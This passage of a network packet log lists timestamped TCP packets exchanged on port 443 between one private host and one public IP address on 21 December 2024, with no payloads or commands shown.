Dec 21, 2024 21:04:48.277673006 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.284699917 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.284923077 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.290812016 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.291199923 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.298758984 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.299150944 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.312578917 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.312865973 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.312921047 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.313489914 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.323833942 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.324135065 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.327133894 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.327400923 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.332015991 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.332273960 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.336777925 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.336986065 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.340506077 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.340820074 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.344963074 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.345376015 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.357647896 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.357876062 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.360094070 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.360507965 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.360526085 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.360697031 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.363032103 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.363265038 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.373078108 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.373290062 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.373306990 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.373538017 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.374002934 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.374212027 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.381212950 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.381453037 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.381477118 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.381793022 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.385085106 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.385351896 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.389235020 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.389607906 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.393086910 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.393307924 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.398652077 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.399003029 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.410417080 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.410665035 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.410888910 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.410888910 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.410907030 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.411578894 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.411717892 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.412002087 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.418937922 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.419229984 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.419857025 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.420193911 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.422736883 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.423074007 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.428843021 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.429059029 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.431865931 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.432216883 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.435549021 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.436044931 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.438812971 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.439060926 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.439083099 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.442131042 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.442477942 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.442496061 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.445558071 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.445753098 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.445770025 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.448824883 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.449172020 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.449188948 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.452827930 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.453016996 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.453033924 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.457248926 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.457600117 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.457617998 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.460553885 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.460900068 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.460917950 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.473201036 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.473550081 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.473567963 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.473953009 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.474140882 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.474154949 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.476944923 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.477287054 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.477305889 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.478689909 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.478887081 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.478905916 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.481208086 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.481544971 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.481563091 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.483459949 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.483647108 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.483664036 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.485985041 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.486336946 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.486354113 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.490164995 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.490483046 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.490500927 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.490987062 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.491158009 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.491178989 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.492387056 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.492736101 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.492753983 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.494626999 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.494796038 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.494812965 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.504838943 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.505043030 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.505106926 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.505162001 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.505181074 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.505311012 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.505501986 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.506105900 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.506367922 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.508167028 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.508408070 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.515260935 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.515454054 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.515511036 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.516452074 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.516721964 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.517961025 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.518228054 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.522105932 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.522326946 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.522454977 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.525219917 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.525437117 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.525871038 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.526078939 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.527162075 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.527352095 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.527369022 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.530013084 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.530349970 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.530368090 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.531961918 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.532319069 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.532336950 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.532500029 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.532835007 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.532845020 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.541152000 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.541344881 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.541367054 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.541383982 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.541496038 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.541625977 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.541632891 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.547440052 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.547787905 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.547787905 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.547806025 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.548443079 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.548650026 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.548669100 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.548815012 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.549794912 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.550163031 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.550180912 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.551641941 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.551964045 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.551981926 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.552979946 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.553318977 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.553335905 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.554837942 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.555035114 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.555052042 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.556302071 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.556639910 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.556653976 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.564088106 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.564404964 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.564421892 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.568954945 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.569075108 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.569092989 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.569334030 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.571674109 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.571878910 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.571897030 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.572206020 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.572387934 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.572405100 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.575046062 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.575409889 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.575427055 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.576560020 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.576740026 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.576756954 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.590986013 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.591006041 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.591304064 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.591322899 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.591454029 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.592200994 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.592422962 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.592489958 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.592508078 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.592679977 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.592720032 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.592875004 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.592885017 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.593175888 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.598078966 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.598285913 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.598376036 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.598555088 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.598573923 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.598738909 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.612313986 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.612437010 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.612493992 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.612557888 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.612575054 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.612740040 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.612931013 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.616342068 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.616889000 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.616889000 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.618294001 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.618484020 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.618549109 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.619927883 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.620187044 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.620430946 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.620733023 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.622394085 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.622646093 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.622893095 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.623126030 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.623974085 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.624190092 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.624933004 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.625207901 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.626528978 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.626857996 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.628294945 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.628531933 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.628542900 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.628551960 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.628777027 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.630382061 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.630698919 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.632110119 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.632436991 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.634689093 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.634970903 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.635210991 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.635227919 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.635287046 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.635575056 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.635587931 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.635732889 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.635986090 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.636205912 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.637171984 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.637409925 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.637566090 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.637753010 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.638495922 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.638756037 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.639620066 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.639857054 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.644834042 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.645020962 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.645035982 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.645199060 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.645291090 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.645304918 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.645503044 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.645669937 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.647284985 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.647526026 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.651267052 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.651520014 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.651529074 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.651546955 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.651777029 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.655345917 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.655467987 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.655841112 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.655854940 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.656157970 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.656225920 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.656239033 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.656596899 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.660259962 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.660439014 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.660475969 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.660490036 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.660689116 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.660698891 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.660710096 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.661067009 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.661454916 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.661643982 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.661761045 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.661926985 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.662256002 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.662468910 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.662826061 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.663162947 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.663203955 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.663219929 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.663384914 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.663726091 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.664045095 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.668843031 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.669101000 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.669610023 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.669819117 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.669950962 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.670911074 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.671006918 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.671261072 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.671261072 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.671282053 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.671437025 CET	49755	443	192.168.11.20	104.21.37.173
Dec 21, 2024 21:04:48.673722982 CET	443	49755	104.21.37.173	192.168.11.20
Dec 21, 2024 21:04:48.674063921 CET	49755	443	192.168.11.20	104.21.37.173
